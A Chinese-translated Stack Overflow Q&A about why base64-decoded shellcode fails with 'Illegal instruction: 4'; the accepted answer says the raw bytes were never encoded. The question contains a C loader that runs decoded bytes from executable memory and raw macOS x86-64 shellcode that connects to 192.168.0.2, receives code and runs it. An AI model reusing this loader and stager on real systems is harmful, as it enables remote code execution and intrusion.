c - 解码后的shellcode不执行: Illegal instruction: 4

标签 c base64 shellcode ansi-c

我有一个c应用程序,它解码包含一些shellcode的base64字符串并尝试执行它,它似乎成功解码,但执行时出现错误Illegal instruction: 4发生。这是大部分代码:

unsigned char shellcode[] = "eDZheDAweDVmeDY4eDAweDEweDAweDAweDVleDZheDA3eDVheDY4eDAyeDEweDAweDAweDQxeDVheDZheDAweDQxeDU4eDZheDAweDQxeDU5eDY4eGM1eDAweDAweDAyeDU4eDBmeDA1eDBmeDgyeDc0eDAweDAweDAweDQ5eDg5eGM0eDZheDAweDQxeDVheDZheDBheDQxeDVieDZheDAyeDVmeDZheDAxeDVleDZheDAweDVheDY4eDYxeDAweDAweDAyeDU4eDBmeDA1eDcyeDMzeDQ4eDg5eGM3eDQ4eGI4eDAweDAyeDA0eGQzeGMweGE4eDAweDAyeDUweDU0eDVleDZheDEweDVheDY4eDYyeDAweDAweDAyeDU4eDBmeDA1eDcyeDE2eDRjeDg5eGU2eDY4eDAweDEweDAweDAweDVheDY4eDFkeDAweDAweDAyeDU4eDBmeDA1eDcyeDAzeDQxeGZmeGQ0eDQ5eGZmeGNieDc0eDFleDZheDAweDVmeDZheDAweDVleDZheDAweDVheDZheDAweDQxeDVheDZheDAweDZheDA1eDU0eDQxeDU4eDY4eDVkeDAweDAweDAyeDU4eDBmeDA1eGVieDk3eDY4eDAxeDAweDAweDAyeDU4eDZheDAxeDVmeDBmeDA1Cg==";
char buffer[4096];
int bufferLen = 4096;

int main() {

  base64decode(buffer, shellcode, sizeof(shellcode));
  printf("%s", buffer);

  void *ptr = mmap(NULL, bufferLen, (PROT_READ | PROT_WRITE | PROT_EXEC), (MAP_PRIVATE | MAP_ANONYMOUS), -1, 0);
  memcpy(ptr, buffer, bufferLen);

  int (*ret)() = (int(*)())ptr;
  ret();

}

原始 shellcode 是 \x6a\x00\x5f\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x68\x02\x10\x00\x00\x41\x5a\x6a\x00\x41\x58\x6a\x00\x41\x59\x68\xc5\x00\x00\x02\x58\x0f\x05\x0f\x82\x74\x00\x00\x00\x49\x89\xc4\x6a\x00\x41\x5a\x6a\x0a\x41\x5b\x6a\x02\x5f\x6a\x01\x5e\x6a\x00\x5a\x68\x61\x00\x00\x02\x58\x0f\x05\x72\x33\x48\x89\xc7\x48\xb8\x00\x02\x04\xd3\xc0\xa8\x00\x02\x50\x54\x5e\x6a\x10\x5a\x68\x62\x00\x00\x02\x58\x0f\x05\x72\x16\x4c\x89\xe6\x68\x00\x10\x00\x00\x5a\x68\x1d\x00\x00\x02\x58\x0f\x05\x72\x03\x41\xff\xd4\x49\xff\xcb\x74\x1e\x6a\x00\x5f\x6a\x00\x5e\x6a\x00\x5a\x6a\x00\x41\x5a\x6a\x00\x6a\x05\x54\x41\x58\x68\x5d\x00\x00\x02\x58\x0f\x05\xeb\x97\x68\x01\x00\x00\x02\x58\x6a\x01\x5f\x0f\x05 printf 语句返回正确的解码后的 shellcode,不带反斜杠,这可能是在解码过程中发生的,这可以解释错误,但如果我在编码之前在 shellcode 中放入双反斜杠,它会用一个反斜杠打印,表明这是 printf 命令删除它。这意味着 shellcode 完好无损,但仍然有错误。

我正在使用这里的base64解码函数:https://github.com/rapid7/metasploit-framework/blob/master/data/headers/windows/base64.h

最佳答案

问题出在编码字符串上。被编码的数据是人类可读的字符串。相反,您需要对原始二进制数据进行编码。

例如,您可以将数据放入文件中。您可以编写一个 C 问题来为您做到这一点。然后将文件导入 base64 作为输入(或直接从程序通过管道传输到 base64)。请记住,您的数据可能包含值为零的字节,因此您需要使用 fwritewrite 将其写出。

关于c - 解码后的shellcode不执行: Illegal instruction: 4,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/56515920/

相关文章:

unix - 如何将 xml 文件编码为 xfdl (base64-gzip)?

c - Windows 8 中的 "Simple"缓冲区溢出

c - C中打印出字符串中的单个字符

java - 需要在Java中加密和解密,无法使用Base64...我认为

java - JS和Java中相同图像的不同Base64字符串

c - 助记符中的无效字符 '\'

linux - 动态查找shellcode的地址,放置在堆栈上

c - 如何为结构分配堆内存?

c - fread 和 fwrite 有不同的结果

c - 我无法在 Windows 7 上设置服务器来监听特定端口